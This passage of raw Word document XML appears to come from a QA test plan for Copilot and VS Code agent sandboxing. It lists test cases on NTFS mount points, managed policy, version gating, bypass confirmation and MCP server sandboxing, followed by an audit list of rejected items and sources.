            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Workspace on an NTFS mount point</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId30" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#343231</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1520" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Dev Drive mounted at a folder (e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\Projects</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, no drive letter); </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">npm run &lt;script&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; then add the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">\\?\Volume{GUID}\</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> path to read-only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍 Same MXC engine — expect failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1187" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1773" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Known (open, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t xml:space="preserve">important</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">): Node </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">EPERM</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">stat</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; adding the GUID path breaks startup </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">0x8007000F</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Fix is upstream (mxc#1548). Dev Drive </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">with a drive letter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> works</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Existing Local chats under managed policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId31" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">VS Code 1.142 release notes</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1520" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Create a Local chat; deliver managed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox.enabled: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; reopen the chat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1187" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1773" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Chat auto-moves to Copilot harness; original archived only after the new chat opens; nothing sent automatically. Claude, Codex and terminal chat unavailable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Local chat continues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Version gate only when sandbox is actually on</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId32" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#341561</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1520" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Below-minimum client; deliver </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> object with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / omitted; then flip to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and back</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1187" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1773" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Expected: blocked </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">only</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> when effective </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">enabled</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; flipping back clears the block. Fix landed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">server-side</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (settings engine); VS Code issue still open — verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Bypass after an in-sandbox error</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId33" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#337310</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1520" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowUnsandboxedCommands: true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; trigger a command that fails from a sandbox error, not a policy denial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1187" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1773" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Known: run-outside confirmation may </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> be offered; also non-deterministic (model may not request it)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">GH-40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Per-server MCP sandbox in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">mcp.json</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:hyperlink r:id="rId34" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">vscode#297115</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1520" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">WSL/Linux only: several stdio servers, some with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">"sandboxEnabled": true</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, at user and workspace scope; check Process Explorer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1187" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1773" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Only opted-in servers sandboxed; their tool calls need no approval; error link shows missing grants. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Not available on Windows</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (separate from Agent Host sandbox)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Unsandboxed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Reviewed and not added</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (kept for audit):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cli#5206 (resumed-session approvals)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — real bug, but the reporter had the sandbox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">disabled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; not a sandbox test.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cli#5193</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — feature request (MCP reading effective policy), nothing to test yet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">vscode#337535</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — feature request for guided prerequisite install; NG-05 already covers missing dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">vscode#290620 / #322403</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">legacy Local-harness</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminal sandbox (macOS/Linux, old </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chat.tools.terminal.sandbox.*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keys); the forced-first-sandbox change was reverted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Claimed maintainer workaround on vscode#338112</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (grant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> read) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">no such comment exists</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; the only workaround there is the reporter turning the sandbox off.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Claim that Claude/Codex stay available when effective </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> is false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — not in vscode#341561; VS Code docs (21 Oct) say any managed settings disable them, so NG-09 stands.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">"Developer: Restart Local Agent Host" after policy sync</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — not in the cited issue; try it if Policy Diagnostics updates but sessions don't.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">All opened on 22 Oct 2026. 🔍 cases mark where these pages don't state the outcome or disagree — record the real result and update the table.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Using local sandboxing (GitHub Docs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Configuring local sandbox settings (GitHub Docs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Understanding local sandboxing in Copilot CLI (GitHub Docs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">About cloud and local sandboxes (GitHub Docs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Enterprise managed settings reference (GitHub Docs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Hooks reference — sandboxed sessions (GitHub Docs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Sandbox Copilot agent sessions (VS Code Docs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Manage AI settings in enterprise environments (VS Code Docs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">copilot-cli issue #5089 — ACP mode ignores sandbox</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Copilot Sandboxing Rollout Runbook (project doc, 14 Oct 2026) — ring structure, profiles and smoke tests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">VS Code QA test plans and GitHub issues (opened 22 Oct 2026; bug states may change):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#342468 — per-session sandbox with managed allowBypass</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#336964 — effective policy report</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#336970 — Agents and editor windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#339641 — Agent Host sandboxing</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">vscode#338294 — managed sandbox policies</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#339645 — managed settings resolution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#339644 — Integrated Browser restrictions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#342465 — trusted CA</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#342467 — Windows local-network notice</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#340696 — Dev Container sessions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">#319218 — reads outside workspace</w:t>
        </w:r>
